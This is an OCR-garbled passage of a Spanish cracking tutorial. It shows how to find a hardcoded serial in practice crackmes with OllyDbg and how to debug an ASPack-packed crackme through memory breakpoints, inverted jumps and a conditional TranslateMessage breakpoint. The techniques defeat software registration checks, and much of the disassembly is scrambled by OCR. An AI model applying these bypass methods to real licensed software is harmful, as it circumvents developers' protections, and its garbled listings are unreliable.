repetira el loop y hará lo mismo con los terceros y asi, una vez que se completo la palabra HARDCODED 
si todos los bytes en la comparación CL con DL han sido iguales, no saltará a mostrar el mensaje de 
SORRY y llego aquí 


BB4B1375/] . 8D1D 15324001 LEA EBX,DWORD PTR DS: [493215] 


> ES ES BYTE PTR DS: [EAXJ,0 


3A083 MOU CL,BYTE PTR DS: [EAXJ e 
313 MOV DL,BYTE PTR DS: [EBXJ 


6Ba4A1 
an401 
60451 


Como EAX ya termino de apuntar a todos los bytes de la palabra HARDCODED pues llego al cero del 
final de la string veamos. 


ESI 00401178 
EDI OB12FCEC 


EIP 6040137B Spl 


CO ES 0023 32b 


Spl 


Allí EAX apunta a 40135C que en el DUMP vemos que es el cero al final de la string entonces al ser la 
comparación ambos miembros iguales 


72 64 43 6F 64 65 64| ardloded 
6A 20 68 15 32 40 00/.j h326, 
69] FF. 35 29 34/40 B9 ES BB] Sese.bq 


El JE salta y nos saca del LOOP 


4001 LEA EBx, DWORD PTR DS: [403215] 
a CMP_BYTE PTR DS: [EAXJ,0 


MOU CL,BYTE PTR DS: [EAXJ 
MOU DL,BYTE PTR DS: [EBXJ 
CMP CL, DL 


1000 DD 


Y 
rd o fl fl flo fa pra | 


15] A 
0040 40 INC EA%x 
an4a 3 INC EBX 
15515] “JEB ER 
6045 wSEB 2F 


Y nos lleva al cartel de CORRECTO (porque cambiamos los flags Z de las comparaciones byte a byte 
jeje) 


6B4B1 
80401 
60461 
Bo401 
60401 
Bo401 


404013 
66461 
00401 
66461 ] 
004013D0 


Por supuesto yo lo hice invirtiendo en cada comparación de CL con DL el flag Z, para que el programa 
crea que son iguales si no saltará al cartel malo y no llegaré aqui, pero de todas formas ya sabemos 
entonces que el serial correcto es la palabra HardCoded respetando mayúsculas y minúsculas porque 
tienen diferente valor ASCII. 


Splish, Splash Ea 
File Help 
Hard Coded: |HardCoded 


Check Hardcoded 
Name: | 


Serial: | 
NamefSerial Check 


Quito todos los BPX y tipeo el serial que halle, y al apretar CHECK HARDCODED 


Splish, Splash 


Congratulations, you got the hard coded serial 


Otro vencido, si ustedes están leyendo esto pues, felicitaciones también para ustedes pues lo han vencido 
también, si no no podrían leer esta lección y si el password del rar se los paso un amigo, mejor releer todo 
y practicar que haciendo trampa no se aprende, jeje. 


Bueno pues vamos con el ultimo HARDCODED y terminamos ya con esto, para pasar el siguiente tema 
en la parte 16. 


Bueno el siguiente crackme es algo diferente a los anteriores es al llamado SAMBO y lo arrancamos en 
OLLYDBG. 


Entry Point Alert 


A Module 'SamBo' has entry point outside the code (as specified in the PE header). Maybe this file is 
self-extracting or self-modifying. Please keep it in mind when setting breakpoints! 


Nos sale este cartelito de OLLYDBG que nos avisa que algo pasa, alli dice que la fila se auto- 
descomprime o se auto modifica, lo que en la jerga del cracking se llama una fila empacada, comprimida 
o empaquetada, lo cual estudiaremos en profundidad mas adelante, pero igual podemos a pesar de que 
este empacada, correrla en OLLYDBG y tratar de hallar el hardcoded serial. 


Aceptamos el aviso de OLLYDBG y llegamos al EP. 


Compressed code? 


2 Quick statistical test of module 'SamBo' reports that ¡ts code section is either compressed, 
sy) encrypted, or contains large amount of embedded data. Results of code analysis can be very 
unreliable or simply wrong. Do you want to continue analysis? 


ETA 


Otro avisito en este caso antes de analizar OLLYDBG nos avisa que es un programa empacado, 
comprimido, encriptado y que analizar eso es mas inútil que cenicero de moto, jeje, pues el programa se 
ira desempacando mientras corre, por lo cual, elegimos NO, para que no lo analice por ahora. 


AB  AAE  AA S SE Pp y y Pp] 


B300B0B0a 
E EB045D45 


3 
01000000 
E SD 
A E 


Pues si alli estamos en las primeras líneas del crackme, vemos como curiosidad que el crackme no esta 
ejecutando como los desempacados la primera sección después del header que comienza en 401000 


Como la dirección del Entry Point es 4d4001 


163000008 
ana! % EB045D45 


0040498C 
004046090 


AAANdAMNF 


Vamos a ver que sección esta ejecutando, así que voy a VIEW-MEMORY o apreto el botón M. 


tions Window Help 


a) + 1/elmt[wHn/c]7]k[B]r]--s] ¿=81?]- 


500390000] 00BB400A Priv] Ri RU 

15/051=15151515)851]515J5151515] Map |R R MevicerHarddiskUolur 
50400000 | 099081000| SamBo PE header Imag|R RWE 

00401000 | B0607C000| SamBo «text code Imag|R RWE 

90470000 / BOBBFDDO| SamBo «data data Imag|R RWE 

B043C000 | 00BB1000| SamBo .tls Imag|R RWE 

60430000 | 09901000| SamBo «rdata Imag|R RWE 

B043E000 | 00BB300B| SamBo « idata Imag|R RWE 

00491000/ 00BB3000| SamBo «edata |exports Imag|R RWE 

60494000 | 00037000 | SamBo «PSro resources Imag|R E De 
j 9/| BBBB2000| SamBo 3 k: RWE 

60406000 | 00001000 | SamBo «adata Imag|R RWE 

904E0000 | BOBBSO0O Map ¡RE RE 

(AAC OMACACAÍA | CALALACA DIACALA Mar DE pDE 


Vemos que el programa se esta ejecutando en la sección que comienza en 4D4000 y su largo es 2000, 
pues 4d4001, es una dirección de memoria perteneciente a esa seccion. 


Pues eso era lo que avisaba OLLYDBG que el ENTRY POINT esta fuera de la sección code 


50380000 | OOBB3ODA Map |R R xDevicerHar 
00400000 09901000| SamBo PE header Imag|R RWE 
B007C000| SamBo ¿text Sua Imag|R RWE 
BOBBFODO| SamBo «data Imag|R RUE 
60430000 | 00BB1000| SamBo .tls Imag|R RWE 
90430000 | 09901000| SamBo «rdata Imag|R RWE 
B043E000 | 0BBB30BB| SamBo «idata Imag|R RWE 
90491000 | 00BB3000| SamBo «edata |exports Imag|R RWE 
60494000 | 00037000 | SamBo «PSro resources Imag|R RUE 
604CB000 | BBBB9BBB| SamBo «reloc l Imag|R RWE 
60404000 00002000 SamBo «aspack |SFX, imports Imag R RWE 
90406000 | 00901000| SamBo «adata Imag|R RUE 
B04E0000 | BOBBSODO Map [RE RAE 
(AAC OIACACAÍA | CAALACA DIACALA Mar DE DE 


La sección CODE empieza en 401000, allí vemos resaltada la palabra CODE y nosotros estamos 
ejecutando la dirección 4D4001 que pertenece a otra sección, OLLYDBG nos aviso de esto que es una 
característica de muchos programas empacados. 


La sección en la cual esta el ENTRY POINT corresponde al desempacador y una vez que se ejecuta y 
realiza su trabajo, salta a la sección code donde se ejecuta el programa en si. 


Pues entonces hagamos F9 o RUN 


Thing-o-matic(Un-Regg... E (50 X] 


Goes Here! 


SAMEO 


Al aparecer la ventana del crackme, para ingresar el serial, sabemos que el programa ya esta desempacado 
en memoria y esta ejecutándose ahora en la sección code, por lo cual podemos poner un BPM ON 
ACCESS en dicha sección, para que pare allí cuando ejecute alguna línea de la misma. 


O ATAR La vw 


00300000 | 00001000 Priv! Ru Ru 
0B3E0000 | 000B4000 Priv! Ru Ru 
08400000 | 00001000 | SamBo PE header |Imag|R RUE 
0401000 00070000 SamBo  |.temt code Imaa'R RUE 
0047D000|B000FOG0| SamBo  |.data [data A 
0042C000 | 00001000 | SamBo .tls Actualize 
0042D000|00001000|SamBo  |.rdata EA! 
0B42E000 | 00003000 | SamBo «idata Wiew in Disassemmbler Enter 
ra oa Le 
¿3MBO «TSrc resou: Ñ 
004CED00 BOOBSORA Sambo | .reloo Dump in CPU 
00404098 B0Ua2000 Sambo — |.aspack (SFX, Dm 
E e e ds A 
GOSABADA| ABRAZa9a Search Ctra 
OOSBDODO | DO1B3OBO 
BBECO0BA | VBBBIABA Search next CtrHL 
0B9CH0DB | 00010000 
d0£CO000 | abosao0o Set break F2 
reak-on- 
00F 19000 | 00001000 Orea OTSELESS 
06200000 |00001000| SSSensor PE he: 
062D1000|00009000| SSSensor .tent [code 
de20c000| abnasons|Sssensor| data [deta 
ensor| data lata p 5 
B62£1000| 0B0B1000| SSSensor| . shared Set memory breakpoint on writé 


Al tratar de volver a la ventana del crackme, para OLLYDBG en la sección code o primera sección 
después del header. 


CMP_BYTE PTR_SS: [EBP-5J,0 


JMP_ to USER32.llaitMessage 
3 a 


X 
MOU DWORD PTR FS: CEAX],EDX 
PUSH_SamBo. 08450381 
LEA EAXx, DWORD PTR SS: [EBP-16] 
Mau Fnx.2 


Veo que ahora que esta descomprimido el programa en memoria, puedo analizarlo entonces, en el listado 
hago click derecho 


YI 


Copy to executable 


Remove analysis'orn module 


A] A 2 2] TEN ¡a a ra AAA 


a . 8B45 FC MOU EAX, DWORD PTR_SS: [EBP-4] 

a . ES 29F9FFFF 

a - ES E46FFDFF 

la] > ES A1FAGIGD CGetCurrentThreadId 
a . 8B15 9060480 E EDX, DWORD PTR DS: [486090] SamBo. 00487458 

a . 3802 CMP EAX, DWORD_PTR_DS: [EDXJ 

la] . ES 9827FCFF 

a . con E CHORH SanBo. OD4SCS54 AL, AL 

15! .Y 

a . [645 FB 00 Reza] BYTE PTR SS: [EBP-5],0 

a > EARL BB —|CMP BYTE PTR_SS: [EBP-51,0 De 
15) . 

o ad: PSa1azoo | Baul SoneocOBareRRd Cuaitilessage 


XO0R a EAX 

EN POP E 

POP ECx 

MOU DWORD PTR FS: CEAX],EDX 


59 

64:58910 

68 S1C84599 | PUSH_SamBo. 60450881 

8045 FO LEA EAXx, DWORD PTR SS: CEBP-10] 
B2000099 |MOU EDx,2 


EB72FDFF 
c3 

ESGEFDFF 
B EB 


¡DODODIDID 


SBFA OU EDI,EDX 
Ai 047C43800 [MOU EAX, DWORD PTR DS: [437004] 


ES CODSFFFF | CALL SaBo. BB4S9CED 


Vemos que OLLYDBG nos muestra el código analizado ahora perfectamente. 


Ahora que estamos en la sección code, podemos ver que apis usa el programa, esto no lo podíamos hacer 
en el inicio, pues en ese momento solo nos mostraría las apis que usa el desempacador, y no las que usa el 
programa, ahora no hay problema. 


SI Find references to » | Name in all modules 


AIELEA EAP ECPEDCE DE APRA ES Y y] 


Address l Section l Type l Name / Comment 

BOB4DSOBA| .aspack | Import oleaut32.35 

DO4O3BEC | .tent Export  |P5xp$265Shdocuw_t lbETCpopllebBrowser 

DO0410960| .text Export  |P5xp+265hdocuw_t |bBTCppllebBrowser 

10402274 | .text Export PFxp5285hdocuw_t |bBTCppShe l Windows 
BO4OFCES| .text Export PS5x+p$285Shdocuw_t lbeBTCppShel Windows 
B0402180|.text Export P5xp529Shdocuw_t |bETCppShe l lUIHe lper 
BO4BFECC|.text Export ESxp529Shdocuw_t |béTCppShe | LUIHe lper 
BO4B3BOC|.text Export E54p529Shdocvw_t |bETCppllebBrowser_V1 
BO4113BC|.text Export | P5xp$29Shdocuw_t IbETCopllebBrowser_U1 
BO4D1EEO|.text Export  |P5xp$32Shdocuw_t lbBTCppCScriptErrorList 
1BB40F9DS| text Export Esxp$325hdocuw_t |bBTCppCScriptErrorlList 
1b0402A14|.text Export PExwp$32Shdocuw_t IbeBTCppInternetExplorer 
B041036B9| .text Export PSxp$3253hdocuw_t IbETCpopInternetExplorer 
B0401D98|.text Export ESxpF33Shdocuw_t |bETCppSearchAssistantO0C 
BO4OFSES|.text Export E5xp$33Shdocuw_t |bBTCppSearchAssistantO0C 
DO4B23BC|.text Export | P5xp$34Shdocvw_t |béTCppShe l |Browserllindow 
BO4BFDSC|.text Export E5xp5345hdocuw_t |bBTCppShe l lBrowserlindow 
B0401FD4|.text Export ES+p$36Shdocuw_t |beTShel lFavoritesNameSpace 
BO4BFA?S| .text Export PExp$36Shdocuw_t IbeTShel lFavoritesNameSpace 
B0411B94|.text Export PEShdocuw_ocxBFinalize 

B0411B7C|.text Export PEShdocvw_ocxBlnitialize 

BO406780|.text Export GGUnitiBFinalize 

DO406770| .text Export lGlnitialize 

BO4DSBAA| .aspack | Import «Rot ivateKeyboardLayout 

04059042 | .aspack | Import BitBlt 

B04D50B2| .aspack | Import ole 
6047D098| .data Export  |__ CPPdebugHook 


BO486E9C | .data Export  |_ 
BO4B13C5|.text Export  |_ GetExceptDlLLinfo 
BO4D4F60| .aspack | Import pere ias GetModu leHandleA e 


BO4D4FSC| .aspack | Import 
604D599A| .aspack | Import 
B04D4F64| .aspack | Import 
B04D4001| .aspack |Export tryPoint> 

B04D5092| .aspack | Import advapi32.RegC loseKey 

DO4BFS7C| text Export | GShdocuw_ocxBRegisterigqgry 

BO047D6F3| .data Export | EShdocvw_t lbfTCppCScriptErrorListE 

6B431E44| .data Export fShdocuw_t l|beBTCppCScriptErrorListE 

bO4B1F6S| .text Export EShdocuw_t |beTCppCScriptErrorListBsbctrigarp18C lassesBTComponent 
BO40FAGS| .text Export EShdocvw_t IbBTCppCScriptErrorListéfbotriggrpi8C lassestTComponent 
DO4BERES| .text Export  |fShdocuw_t IbéTCpopCScriptErrorlListfBeforeDestruct ions$aqqru 
DO040E7D4|.text Export  |PShdocuw_t IbBTCpopCScriptErrorl istfConnect$ggrv 

DO4DEACC|.text Export  |fShdocuw_t IbBTCppCScriptErrorl istBConnectTo+gqr91%4TComInterfaces285hd| 1 argument 
BO4DE9DO|.text Export EShdocvw_t IbBTCppCScriptErrorListéDisconnectiqgrw 

BB4BESDO! .text Export EShdocuw_t |beBTCppCScriptErrorL istBGetDefaultInterfacesqu 
BO4DESF4|.text Export EShdocvw_t IbBTCppCScr iptErrorL istfGetDunk$aqrv 

BO4DEBEC|.text Export EShdocovw_t IbBTCppCScriptErrorListGlInitServerDatasqgrv 

B047DA3C | .data Export  |PShdocuw_tlbéTCpopInternetExplorerk 

Ba482188| .data Export  |PShdocuw_tlbeTCppInternetExplorerk 

10403000 | .text Export  |PShdocuw_tlbeTCppInternetExplorerfiboctrigarpi8C lassesfTComponent 
BO04108FD|.text Export EShdocvw_t lbBTCppInternetExplorerfibctrigarpiSClassestTComponent 
1004033838 |.text Export EShdocvw_t |bBTCppInternetExplorerfBeforeDestruct ionsqgru 
BO4BS4EC|.text Export EShdocvw_t |béTCppInternetExp lorerfClonnectigqgryu 

104038340 |.text Export EShdocovw_t IbBTCppInternetExplorerflonnectTosgar834TComInterface$24Shd| 1 argument 
D0408750| .tent Export  |PShdocuw_t lbeTCppInternetExplorerfDisconnectigqrv 
DO403208| .text Export | EShdocvw_t IbeTCppInternetExplorerfGetDefau ltInterfacesqu 
DO4BS22C| .text Export |PShdocuw_t IbGTCpopInternetExplorerfGetDunk+aqru 


GetProcAddress 
ImageL ¡st_Add 
LoadL ¡braryA 


Ughh que mal trago una terrible lista y ninguna conocida, veamos la lista de strings, aclaramos que esto 
tampoco se podía hacer en el inicio pues estábamos en otra sección y además las strings estaban 
empacadas junto con el programa así que no veríamos nada. 


or cs a 

] Name (label) in current module Ctrl 
Find references to » | Name in all modules 

] dll d Cornmand Ctrl 

pr 1 a iii ñ Sequence of commands Ctrl 

| SreMAR "constant 

3 Appearance »| Binary string Ctrl 


All intermmodular calls 
All cormmands 

All sequences 

All constants 

All switches 


En una terrible lista vemos 


HOgress |ULSassemD Ly plest string 


Ba4B161F/ASCII ” 056”,6 
B0401043| ASCII "O_G”, a 
0401049 | ASCII "ELZG”, 0 
pa401068| ASCII "pwG 


D040106E| DD SamBo. 0B477CA4 ASCI 
B040107A| DD SamBo. 00473618 ASCI 
Ba40161C| MOV EDx, SamBo. B047D0C1 ASCI 


B0401744|ASCII "Sysutils::Except” 
B0481754/|ASCII ”ion”,a 
B04B17F3|ASCII "Exception %”,0 
60401834| ASCII ea ia 


pa0401844 | ASCII ” 


Ba401912| DD _SamBo. 00400009 ASCI 
B0401934| ASCII "System: :TObject”, 8 

DO40195C | ASCII "Exception *”,0 

Ba401A24 | ASCII "TFormi *”,0 

B04B1A36|MO0U ECXx, SamBo. 0047D1C5 ASCI 
0040143 MOU EDX,SamBo. 0947D1AD ASCI 
004018093 MOU ECX,SamBo. B847D1FD ASCI 
B040189D| MOU EDx,SamBo. 80470109 ASCI 
BO0401B1F | MOU EDX, SamBo. 00470209 ASCI 
00401854 MOU ECX, SamBo. 06470233 ASCI 
BO0401B59| MOU EDx,SamBo. 80470223 ASCI 
BO4B1B5C | MOU ECX, SamBo. 06470253 ASCI 
00401B71/M0U EDX,SamBo. 08470237 ASCI 


3|MOU_EDX, SamBo. 00470260 ASCI 
DO4B1BFC ASCII "TForm *”,0 
pa401C10| ASCII "AnsiString *”,0 


BO4B1C2E|DD_SamBo. 00400006 ASCI 


BO401C50| ASCII "Forms 
B04B1CAS| ASCII "TForm 


Puros 


ARANACOT 


¿TForm”, 0 


I "hLRH” 
I "hdRH” 
I "tSamBot” 


"TER" 

1 "Thnxw to Crackmes. de” 

a p> + i Crackneg” 

1 + if it weren't so easy” 
a "Thing-o-mat ic(Registered)” 

I "WAY YOU GOT IT*t” 

I "JUST JOKING+” 

1 "nope, actually ¡it was wrong” 

1 "Thing-o-maticíShareware)” 

"RP" 


YOU DID TT, una de las strings del cartel de felicitación 


J04B19F7]] . ES 54440700 
304B1AFCI].. 59 
30401AFD|] .  84Cc9 
I04B1AFF 74 40 

169 Ai DCóc4s0B 
6A 40 
B9 FDD14700 
BA _D9D14700 


2800 

Es 6FAS3O700 
66:0745 DC 1 
BA M9D24700 


ES 6CA30700 
FF45 ES 
£B10 

Al 9C6E45800 
Es 35180600 
FF4D ES 
8045 F4 

BA 02000008 
ES 05A40700 
EB 62 

>A1 DCó6c4s0B 
sA 40 

B9 33D24700 
BA 23024700 


3600 
ES 23430700 
Ai DCcó6c4s0B 
£sA 18 


B9 53D24700 
BA _37D24700 
2800 


ES OBAS30700 
66:0745 DC _2 
BA 60D24700 
8045 FO 


vor ss 


DICAD 
commo 
BS _ 0D 
Es 
m 
luly] 
Xi 
l=] 
% 


pain PTR DS: [486CDC] 


MOU ECX,SamBo. 9947D1FD ASCII 
MOU EDx,SanmBo. 60470109 ASCII 
mou ASI PTR_DS: [EAXJ 


MOU WORD _PTR SS: [EBP-24],14 
UY EDX,SamBo. Al ¡209 ASCII 
LEA EAX,DWORD PTR SS: [EBP-C] 


INC DWORD PTR SS: [EBP-18] 
MOU EDX, DWORD PTR DS: [EAXJ 
MOU EAX, DWORD PTR_DS: [_Formi] 


DEC DWORD PTR SS: [EBP-18] 
LEA EAXx, DWORD PTR SS: [EBP-C] 


z 
[=] 
ly 
Le 
Es] 
o 


MOU EAX, DWORD PTR DS: [486CDC] 


MOU ECX,SamBo. 00470233 ASCII 
EDX, SanBo. 89470223 ASCII 
MOU EAX, DWORD PTR DS: LEAXJ 


mou ppal PTR DS: [486CDCJ 


MOU ECX,SamBo. 00470253 ASCII 
MOU EDx, SanmBo. 09470237 ASCII 
MOU EAX, DWORD PTR DS: [EAXI 


MOU WORD _PTR SS: [EBP-24],20 
EDX, SanBo. 89470260 ASCII 
LEA EAX, DWORD PTR SS: CEBP-10] 


bh] ==] 
E [=] 
177] E 
TI 

mi 
E (=] 
o A 

ma! 


a] z 
E [=] 
177] < 
TI 
- 


z 


[=] 
< 
E 
Es] 
fu] 


LSamBo. 0047BF50 


ro did ito 
"I'd be proud, if ¡it weren't so easy” 


"Thing-o-mat icíRegistered)” 


mypr 
"WAWY YOU GOT ITt” 


"JUST JOKINGt" e 
“nope, actually ¡it was wrong” 


"Thing-o-mat icíShareware)” 


Bueno hay una comparación y un salto vemos strings de felicitación y de error aunque no hay 
MessageBoxA por aquí. 


DIHFL 


J401AFD 


. > 
. 8409 
.v¡74 40 

+. [Al DC6C 
6A 40 
E9 FDDi 
BA _D9D1 
2600 

ES 6FAS 
. |66:0745 
+. [BA 09D2 


+. |8D45 F4 
ES 6CA3 
FF45 ES 
£B10 

Al 9C6E 
Es 3518 
FF4D ES 
8D45 F4 
EA B2001 
ES 05A4! 


EB 62 
> »A1 DC6c 
£0 da 


¡DO 


a 


Y 


FUE ELA 
TEST CL,CL 


4300 |(MOU EAX, DWORD PTR DS: [486CDC] 
PUSH_40 


4700 |[MOU ECX,SamBo. 6047D1FD 
4700 [MOU EDX,SamBo. 6047D1D9 
700 MOU EAX, DWORD PTR DS: [EAX] 


DC_1¿M0U WORD _PTR SS: [EBP-241,14 
4708 |MOU EDX,SamBo. 00470209 
na LEA EAX, DWORD PTR SS: [EBP-C] 


INC DWORD PTR SS: [EBP-18] 
MOU EDX, DWORD PTR DS: [EAX] 
49809 |MOU EAX, DWORD PTR_DS: [_Formi] 


(911515) 
DEC DWORD PTR SS: [EBP-18] 
LEA EAXx, DWORD PTR SS: [EBP-C] 
BOBO [MOV EDX,2 

arab 


4300 [MOU EAX, DWORD PTR DS: [486CDCI 
PIUISH 44 


ASCII "You did itt” 
ASCII "I'd be proud, if it weren't so easy” 


ASCII "Thing-o-maticí(Registered)” 


le 


Pongamos un BPX en el salto condicional para verificar si es el salto decisivo, quitemos el BPM ON 


ACCESS con click 


derecho 


Hit trace 
Run trace 


Follow Enter 


New origin here CtriGray * 


Go to 
Follow in Dump 
Wiew call tree CtrHk 


Y demos RUN 


Thing-o-matic(Un-Regog... 


GÁMDO 


Toggle 
Conditional 
Conditional log 
Run to selection 


Memory, on access 
Memory, on write 


Hardware. nn axecutinn 


a ES 


F2 
Shi 
Shi 
F4 


En la ventana del crackme tipeamos Narvajita o el serial falso que quieran. 


Apreto el botón Test-o-Doom 


Vemos que salta apretemos F9 


S4c9 TEST CL, CL 


BA 02000009 [MOV EDx,2 


Al 
SA 


JJ) YAY YOU GOT IT! 


74 40 
Ai DCó6c48600 [MOV EAX,DWORD PTR DS: [486CDC] 
5A 40 PUSH_48 


B9 FDD14708 |MOU ECX,SamBo. B047D1FD 

BA _D9D14700 |MOU EDX,SamBo. 90470109 

28009 MOU EAX, DWORD PTR DS: CEAXI 
ES 6rn3a7as | CALL SaBo.A047BESS 

66:0745 DC _1:MO0U WORD _PTR SS: [EBP-241,14 
BA M9D24708 |MOU EDX,SamBo. 60470209 

8045 F4 LEA EAX, DWORD PTR_SS: [EBP-C] 
ES 6cAs070a | CALL SamBo. 0047BE9S 

FF45 ES INC DWORD PTR SS: [EBP-18] 
gB19 MOU EDX, DWORD PTR DS: [EA*xJ 
Al 9C6E4808 |MOU EAX, DWORD PTR_DS: 
ES 35180600 | CALL SamBo. 0B463370 
FF4D ES DEC DWORD PTR SS: [EBP-18] 
8D45 F4 LEA EAX, DWORD PTR SS: LEBP-C] 


DCéc4300 [MOV EAX, DWORD PTR DS: [486CDC1 
40 PUSH_40 


A A 


[_Form11 


ASCII 
ASCII 


ASCII 


nertr 


Pues sale el cartel de que lo lograste y si aceptamos 


u did ito 
"I'd be proud, if ¡it weren't so easy” 


"Thing-o-maticlRegistered)” 


Por 


UST JOKING! 


Q nope, actually it was wrong 


Aceptar 


Te dice que era un chiste y que no acertaste nada jeje, demos RUN nuevamente lleguemos a la ventana y 
lleguemos de nuevo al salto apretando el botón Test-o-Doom. 


1040 . ES 5440700 LSamBo. 0047BFSO 

1940 . POP _ECXx 

1040 . 2409 TEST CL,CL 

ES |. 74 4c 

1401E Ai DCó6c4s08 |MOU EAX, DWORD PTR DS: [486CDCI 

040 6A 40 PUSH_ 40 

04 B9 FDD14700 |MOU ECXx, SamBo. B047D1FD ASCII "You did itt” 

140 BA_D9D14700 |MOU EDX,SamBo. 0047D109 ASCII ”I"d be proud, ¡if ¡it weren”t so easy” 


MOU EQX, DWORD PTR DS: CEAXJ 


MOU WORD _PTR SS: [EBP-241,14 
BA 09024700 |MOU EDx,SanmBo. B047D209 

8D45 F4 LEA EAx, DWORD PTR SS: [EBP-C] 
Es 6casa7ren 

FF45 ES 


INC DWORD PTR SS: [EBP-18] 
MOU EDx, DWORD PTR DS: CEAXJ 
Al 9C6E4809 |MOU EAX, DWORD PTR_DS: [_Formi] 


ES 35180600 

FF4D Es DEC DWORD PTR SS: [EBP-18] 
8D45 F4 LEA EAx, DWORD PTR SS: [EBP-C] 
BA 02000008 (MOV EDx,2 

Es 05440700 


62 
Ai DCóc4s06 (MOV EAX, DWORD PTR DS: [486CDCI 
40 PUSH_40 
B9 33024760 |MOU ECx,SamBo. B047D233 ASCU "vup” 
MA env ARAN ner 


DM DINDA TIA aD. PIO UM ANT TTOP 


2800 
Es 6FA3O70n 
66:0745 DC 


- 


ASCII "Thing-o-mat iclRegistered)” 


¡DOS 
DODID 


< 
m 
lao] 


DO 
O O O O OO 


PANOR MO 


IABARAERARARRAERARARARRARA ARA 


Invirtamos el salto a ver si sale el cartel de felicitaciones, para ver si es esto verdaderamente lo que 
decide. 


TEST CL,CL 
MOU EAX, DWORD PTR DS: [486CDC] 
PUSH 49 

U ECX,SamBo. 0047D1FD 


11 "You did ¡itt” 
11 "I'd be proud, if ¡t weren't so easy 


Do 


MOU WORD _PTR SS: [EBP-24],14 
MOU EDX, SamBo. 00470209 ASCII ”"Thing-o-maticlRegistered)” 
LEA EAx, DWORD PTR_SS: [EBP-C] 


INC DWORD PTR SS: [EBP-18] 
MOU EDx, DWORD PTR DS: CEAXJ 
MOU EQX, DWORD PTR_ DS: [_Formi] 


DEC DWORD PTR SS: [EBP-18] 
LEA EAX, DWORD PTR SS: [EBP-C] 
MOU EDx, 2 


MOU EAX, DWORD PTR DS: [486CDCI 
DIUISU An 


Al hacer doble click en el flag Z no saltara doy RUN 


Y! ) T'd be proud, ¡fit weren't so easy 


Y sale el cartel de felicitación, así que por aquí es donde decide las cosas, veamos la comparación antes 
del salto. 


.>Y PUE ELX 
T 


Y4 48 
. Al DCó6C4860 |MOU ERAX, DWORD PTR DS: [486C0'3y 
£n Ara DIC Ara A 


Es un TEST CL,CL que solo testea si CL es cero o uno, así que la comparación se realiza antes, 
posiblemente en el CALL que esta justo antes pongamos un BPX alli. 


. BA 62000098 |MOU EDX,2 L 
. ES 54A40709 |CALL _SamBo. 0047BF59 5 
. 59 P ECX 

. 8409 TEST _CL,CL 

.v 79 40 


. Al DCó6C43808 |MOU EAX, DWORD PTR DS: [486CD0CI 


Demos RUN y volvamos a la ventana y apretemos nuevamente el botón Test para que pare ahora en el 
CALL. 


Una vez que paro como soy curioso miro un poco alrededor jeje 


Argl = BBBBBBDO 


0 


¡DEAD 
Dala 
Deod 


do 


05700 


UNICODE ano” 


Y 
y 


JA pr fo fdo fdo fdo pode poda pa 


ASCII "Narvajita”. 


an E RETURN to SamBo. 004648DA 
1515) 51% 
1515] 1515] RETURN to Sambo. 0047 from S: 
ge [RETURN to SamBo. 60478707? from SamBo. 


Dí 


Dí 
DOE 


SamAn. ARÍZARFA 


UvIZ v10UZbu4 10] UNIL 0 10 expression LU Il 
ani Bu12FB6S 
ani 15js]5]51515]5]5) 
BB12FB BBDC4394 
| es 
Mm12 , 
Sueiro | oasadans Appearance 
—|Ou12FB?D  BBDCSESIA ASC A 
4b12FB74/fp4e12FB98/___ _ A Aa 


mat ic(Sh 
areware) 
....DzH. 
A>H.d1.. 


Mi ojo de cracker ve por ahí una string con forma de posible serial correcto, podría probar a ver si es pero 
por ahora seguiré con el método de buscarlo a fondo sin intentar. 


Si alguna vez comparara o operara con mi serial falso dentro del CALL, pues poniendo un BPX ON 
ACCESS en el mismo, parara cuando el programa quiera hacer algo con el, o sea al acceder al mismo 
para cualquiera operación o comparación que desee realizar. 


Narvajit 
a.m BzH. 
BzH.£)l.. 
1556555. 
BzH.B2H. 
£)..9-0- 
mati! Ch 


Así que marco mi serial falso y hago click derecho 


Backup 


Copy 
Binary 


Breakpoint Memory, on access 


Search for » Memory, on write 


Con lo cual si doy RUN y dentro del call accede a mi serial falso, parara OLLYDBG. 


Apreto F9 


Vemos que no para, quizás la comparación sea antes, así que o bien podemos ir poniendo BPX en los 
calles que están mas arriba de este y repetir el método o bien empleamos el método de parar justo cuando 
el programa ingresa el serial, aquí no utiliza la api GetWindowTextA pero tenemos nuestros Mensajes de 
Windows los cuales seguro nos servirán. 


Quito el B?”M ON ACCESS 
Cornment : E 
Breakpoint Toggle Fe 
Hit trace »'  Conditional si 
Run trace »'  Conditional log si 
Go to »' Memory, on access 


Follow in Dump Memory, on write 
View call tree CtrHK 7 


Command BP TranslateMessage] L 


Y doy RUN 


BFS| 55 
Y7D1SBF9| 8BEC MOU EBP,ESP 
7701: | 56 PUSH _ESI 
vrDi; 3B75 48 MOU ESI, DWORD _PTR_SS: [EBP+8] 


77D1SBFF| 66:817E 08 ESB CMP WORD PTR DS:[ESI+8],BES 
77D18C05|v BF84 3E7E0200 | JE USERS2. 77040949 

77D1: 6A Ba PUSH B 
?P?7D18C0 56 PUSH ESI 
77D18C0 ES DGFEFFFF 


Allí para en la api, así que hago click derecho 


EDI [ 


B 


EJ A E 
Backup » 


55 PUSH_EBl 
SBEC MOU EBP,ESP 
56 Pu: Copy > 
SB75 08 MOU ESI,DWORD PTR_SS: 
66:817E 88 ESOÍ CMP WORD _PTR DS:LESI+ — pinar » 
9r4 SE7EO200 y 
56 ssemble ace 
A bl S 
ES DEFEFFFF 
SE Label 


Comment 
Breakpoint Toggle 
Run trace »'  Conditional 


Go to Nl_ Corditenallog) 


330B 

E9 OSFDFFFF 
90 

90 


Set conditional log breakpoint at USER32.T... [X] 


ú 


Decode value of expression as: | Assumed by expression y 


Never  Oncondition Always Pass count [dec.] 


| 
Pause program: e Oj ) | D. | 
| 


Log value of expression: E - 


Log function arguments: E s 


lf program pauses, pass following commands to plugins: 


Y en la ventana tipeamos la condición MSG==202 que era el valor de WM_LBUTTONUP 


Y ponemos las tildes para que pare ON CONDITION y que loguee siempre todo. 
m4X] Pjl] v:+: $04: 9] + 1] 


MOU EDI,EDI 

] PUSH_EBP 
, MOU EBP,ESP 

PUSH_ESI 
£Br5s 63 MOU ESI,DWORD_PTR_SS: [EBP 
66:817E_08 ESOÍ CMP WORD PTR DS: [ESI+58],0 
0FS4 3E7E0208 | JE USERS2. 77040449 
6A 60 PUSH B 


56 PUSH ESI 
ES DEFEFFFF 
SE POP ESI 


5D POP EBP 


Allí esta en rosado el BPPX CONDICIONAL doy RUN 


Llego a la ventana del crackme y para evitar confusiones cambio el serial por si quedo el anterior en la 
memoria. 


y al apretar el botón para en mi BPX CONDICIONAL 


from SamBo. 0045BERD 
